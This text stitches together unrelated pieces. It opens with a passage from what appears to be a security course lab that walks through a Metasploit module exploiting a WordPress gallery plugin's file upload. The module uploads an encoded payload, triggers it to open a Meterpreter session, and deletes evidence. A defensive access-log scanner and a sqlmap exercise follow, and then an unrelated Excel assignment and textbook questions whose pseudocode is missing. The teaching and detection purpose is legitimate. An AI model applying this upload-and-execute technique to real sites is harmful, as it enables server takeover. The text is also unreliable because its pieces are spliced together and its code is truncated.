Nobody wants to be a script kiddie, and, sadly, in-memory DLL injection is beyond the scope of our skills at this point, but we can at least look at the exploit we just used and understand it. The link to the announcement and code for this exploit is actually listed as part of the  wpscan  output from Milestone 2 (rapid7 is the company that sells the commercial version of Metasploit). From there, you can get to the code for this exploit in Github. It’s written in Ruby. Don’t know Ruby? Doesn’t matter. Let’s look anyway:

 

 


    require 'msf/core'

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HTTP::Wordpress
      include Msf::Exploit::FileDropper

This is the  class  declaration of the module and associated  require  /  include  statements pulling in the required parts of MSF. Lines 11 and 12 show the payload and its delivery mechanism are just components of MSF.

      def exploit
        php_pagename = rand_text_alpha(8 + rand(8)) + '.php'

        data = Rex::MIME::Message.new
        data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfi
        post_data = data.to_s

Line 47 shows how the filename of the dropped payload is created randomly, and lines 49 – 51 show how the MIME attachment is created and how the encoded  payload  is added to it as a binary data stream, which is serialized as a string for the  POST  request.

And here’s the multipart upload  POST  request, which just mimics what the browser sends to the WordPress server when the user uploads a file. The plugin accepts the binary content just as it would for an image. Note the  uri  value contains the components of the path to the vulnerable source in the plugin.

        res = send_request_cgi({
          'uri' => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'script
          'method' => 'POST',
          'vars_get' => {
            'Year' => "#{year}",
            'Month' => "#{month}"
          },
          'ctype' => "multipart/form-data; boundary=#{data.bound}",
          'data' => post_data
        })

        if res.code == 200 && res.body =~ /success|#{php_pagename}/
          print_good("Our payload is at: #{php_pagename}. Calling payload...")
          register_files_for_cleanup(php_pagename)

If the response code is OK, the module marks the uploaded file for cleanup, which happens immediately after the next step. The payload is deleted so obvious forensic evidence of the hack isn’t left on the target server.

Finally, the payload is activated via another HTTP request, which opens the Meterpreter connection.

        send_request_cgi(
          'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}", "#{month
        )

 

 


One takeaway from this is that the framework, MSF, is doing all the heavy lifting here: the payload is provided (even in encoded form), activating it is a single function call, and even the cleanup is provided as a core function. All the author had to do here was create and issue a multipart  POST request.
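Deleting the payload removes it from disk, but the web server's access log still records both the upload and the request that ran it. The following is an added example, not code from the lab or from Metasploit: it scans an Apache combined-format log for PHP requests under wp-content/uploads and raises the severity when the same client POSTed to the plugin's admin directory shortly before. The log lines, the five-minute window, the extension list and the PLACEHOLDER.php script name (the page truncates the real one) are assumptions.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote, urlsplit

# Constructed sample log (Apache combined format). PLACEHOLDER.php stands in
# for the plugin script name, which the page cuts off after "script".
SAMPLE_LOG = """\
192.168.33.1 - - [11/Oct/2020:18:02:11 +0000] "GET /wp-content/uploads/2020/10/cat.jpg HTTP/1.1" 200 48213 "-" "Mozilla/5.0"
192.168.33.100 - - [11/Oct/2020:18:04:40 +0000] "POST /wp-content/plugins/reflex-gallery/admin/PLACEHOLDER.php?Year=2020&Month=10 HTTP/1.1" 200 31 "-" "Mozilla/4.0"
192.168.33.100 - - [11/Oct/2020:18:04:41 +0000] "GET /wp-content/uploads/2020/10/mcxgHJixsWZpS.php HTTP/1.1" 200 0 "-" "Mozilla/4.0"
192.168.33.1 - - [11/Oct/2020:18:09:02 +0000] "GET /wp-content/uploads/2020/10/old%2Ephp HTTP/1.1" 404 196 "-" "curl/7.68.0"
this line is not a log entry
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Extensions a PHP handler is commonly mapped to (assumption; match your server config).
PHP_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
UPLOADS_PREFIX = "/wp-content/uploads/"
PLUGIN_PREFIX = "/wp-content/plugins/reflex-gallery/admin/"
WINDOW = timedelta(minutes=5)  # assumed correlation window


def parse_line(line):
    """Return a dict for one log line, or None if it is not in combined format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Drop the query string and decode %XX so "old%2Ephp" cannot hide the extension.
    path = unquote(urlsplit(m["target"]).path)
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m["ip"], "ts": ts, "method": m["method"],
            "path": path, "status": int(m["status"])}


def find_upload_execution(log_text):
    """Flag every request for a PHP file under the uploads directory.

    severity is "high" when the same client POSTed to the plugin's admin
    directory within WINDOW beforehand, otherwise "review".
    """
    last_plugin_post = {}  # client IP -> time of its latest POST to the plugin
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue  # skip malformed lines instead of aborting the scan
        path = entry["path"]
        if entry["method"] == "POST" and path.startswith(PLUGIN_PREFIX):
            last_plugin_post[entry["ip"]] = entry["ts"]
        elif path.startswith(UPLOADS_PREFIX) and PHP_EXT_RE.search(path):
            posted = last_plugin_post.get(entry["ip"])
            correlated = (posted is not None
                          and timedelta(0) <= entry["ts"] - posted <= WINDOW)
            findings.append({**entry, "severity": "high" if correlated else "review"})
    return findings


if __name__ == "__main__":
    for f in find_upload_execution(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["status"], f["path"])
```

A request for any PHP file under the uploads directory is worth reviewing on its own, since that directory should only ever serve media; the correlation step just ranks the findings.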

Challenge: Now that we’ve walked through the exploit, go back to the Reflex Gallery plugin code and identify the fix — specifically, what was changed in the plugin code to prevent this attack?

Hints:

  • The plugin is written in PHP and Javascript — which part would this fix need to be in, and why?
  • Use the source browser changelog viewer to diff specific commits
  • If you ran the MSF exploit against the fixed version of the plugin, what specifically would fail?
  • Two files related to the vulnerability were substantially changed between the two versions

Milestone 7: Hello,  sqlmap

If you think back to all of the Security Shepherd exercises around SQL injection, you probably noticed that finding the right combination of characters and expressions to use would very often boil down to trial and error, educated guesswork, and sometimes dumb luck. Being a coder, you may have thought it’d be nice to have a tool that automates all that guessing and testing. Say hello to our little friend  sqlmap , which does exactly that: given a URL and a parameter string, this tool will attempt to identify SQLI-vulnerable parameters by systematically trying various SQLI exploits — pretty much all of them — and if it finds the right way in, it can exfiltrate an entire database.

As such, one of the tricks to using  sqlmap  is knowing how not to use it. In the wrong hands, it becomes an accidental load-testing tool, firing off thousands of requests from multiple threads and crashing a database. In the right hands, it can identify novel routes for exploitation.

Read the usage docs on this one. In addition to the standard parameters, make sure you understand  threads ,  risk , and  level  that allow throttling and control how aggressively the tool will run. Try different verbosity settings to see what it’s actually doing under the hood.

Challenge: Examine this writeup about a recent SQLI vulnerability in a WP plugin. Follow the same process as before to identify the affected version from the changelog, install it manually, then recreate the exploit described in the writeup using  sqlmap  and confirm the researcher’s results.

Hints:

  • Actually read the usage docs
  • Expect issues, be patient.  sqlmap  is basically hammering your WP VM, which isn’t designed to handle a heavy load.
  • Look at the output carefully, even if there’s an error. Does it match the original findings?
  • To see what it’s doing, try running with high verbosity ( -vvvv ).
  • Try  CTRL-C  and  (S)skip  if something seems to hang
  • When in doubt, accept the default.

 

 


How To Work On A Spreadsheet Document Using The Information Given Assignment Help

Improve It Project 3-7


Central Sierra Insurance is a multi-office company that handles commercial and personal insurance products. In this project, you add missing data and verify that the charts are updated.

[Student Learning Outcomes 3.2, 3.3, 3.4]

File Needed: CentralSierra-03.xlsx (Available from the Start File link.)

Completed Project File Name: [your name]-CentralSierra-03.xlsx

Skills Covered in This Project

  • Edit source data.
  • Switch row and column data.
  • Change chart colors.
  • Apply a chart style.
  • Add and format elements in a chart.
  • Use gradient fill for a chart object.
  • Change the chart type.

Alternate Instruction for Microsoft 365 Apps icon: This image appears when a project instruction has changed to accommodate an update to Microsoft 365 Apps. If the instruction does not match your version of Office, try using the alternate instruction instead.

  1. Open the CentralSierra-03.xlsx start file workbook. The start file will be renamed automatically to include your name. Change the file name if directed to do so by your instructor and save it.
  2. Insert a new row at row 8.
  3. Type Motorcycle in cell A8. In cells B8:D8, type these values: 15, 82, and 24.
  4. Change the pie chart object to a 3-D Pie and apply Style 3. Notice that a data series for “Motorcycle” has been added.
  5. Switch the row and column data for the column chart. The data series for “Motorcycle” is not included.
  6. Click the Select Data button [Chart Design tab, Data group] and reset the source data to show cells A5:D10.
    Alternate Instruction for Microsoft 365 Apps: Click the Select Data button [Chart Tools Design tab, Data group] and reset the source data to show cells A5:D10.
  7. Change the column chart color scheme to Monochromatic Palette 7 in the Monochromatic group.
  8. Format chart elements. [Figure 3-76a: Linear Down gradient]
    1. Select the Side Wall of the column chart and apply Olive Green, Accent 3 shape fill (seventh column).
    2. Use the Shape Fill button to apply the Linear Down gradient in the Light Variations group to the side wall (Figure 3-76a).
    3. Apply the same fill and gradient to the Walls element.
    4. Select the Floor element and apply Olive Green, Accent 3, Lighter 60% (seventh column) with no gradient.
    5. Select the gridlines and use the Shape Outline button to format them with Black, Text 1, Lighter 50% (second column). (To select the gridlines, select the Plot Area and then click one of the gridlines in the chart.)
  9. Select the pie chart object and change the colors to Monochromatic Palette 7 in the Monochromatic group.
  10. Use Olive Green, Accent 3 as shape fill (seventh column) for the pie chart area with a Linear Down gradient from the light variations.
  11. Apply a 1 pt Olive Green, Accent 3, Darker 25% outline (seventh column) to both chart objects.
  12. Save and close the workbook (Figure 3-76).
  13. Upload and save your project file.
  14. Submit project for grading.
 

Programming Language assignment


Kim 4

Textbook Assignment 2 : Introduction

1. Question 3.2. In Fortran 77, local variables were typically allocated statically. In Algol and its descendants (e.g., Ada and C), they are typically allocated in the stack. In Lisp they are typically allocated at least partially in the heap. What accounts for these differences? Give an example of a program in Ada or C that would not work correctly if local variables were allocated statically. Give an example of a program in Scheme or Common Lisp that would not work correctly if local variables were allocated on the stack.

2. Question 3.4. Give three concrete examples drawn from programming languages with which you are familiar in which a variable is live but not in scope.

3. Question 3.5. Consider the following pseudocode: Suppose this was code for a language with the declaration-order rules of C (but with nested subroutines) – that is, names must be declared before use, and the scope of a name extends from its declaration through the end of the block. At each print statement, indicate which declarations of a and b are in the referencing environment. What does the program print (or will the compiler identify static semantic errors)? Repeat the exercise for the declaration-order rules of C# (names must be declared before use, but the scope of a name is the entire block in which it is declared) and of Modula-3 (names can be declared in any order, and their scope is the entire block in which they are declared).

 

 

4. Question 3.7. A part of the development team at MumbleTech.com, Janet has written a list manipulation library for C that contains, among other things, the code in Figure 3.16.

a. Accustomed to Java, new team member Brad includes the following code in the main loop of his program: Sadly, after running for a while, Brad’s program always runs out of memory and crashes. Explain what’s going wrong.

b. After Janet patiently explains the problem to him, Brad gives it another try: This seems to solve the insufficient memory problem, but where the program used to produce correct results (before running out of memory), now its output is strangely corrupted, and Brad goes back to Janet for advice. What will she tell him this time?

5. Question 3.14. Consider the following pseudocode: What does this program print if the language uses static scoping? What does it print with dynamic scoping? Why?

 

6. Question 3.18. Consider the following pseudocode: Assume that the language uses dynamic scoping. What does the program print if the language uses shallow binding? What does it print with deep binding? Why?

 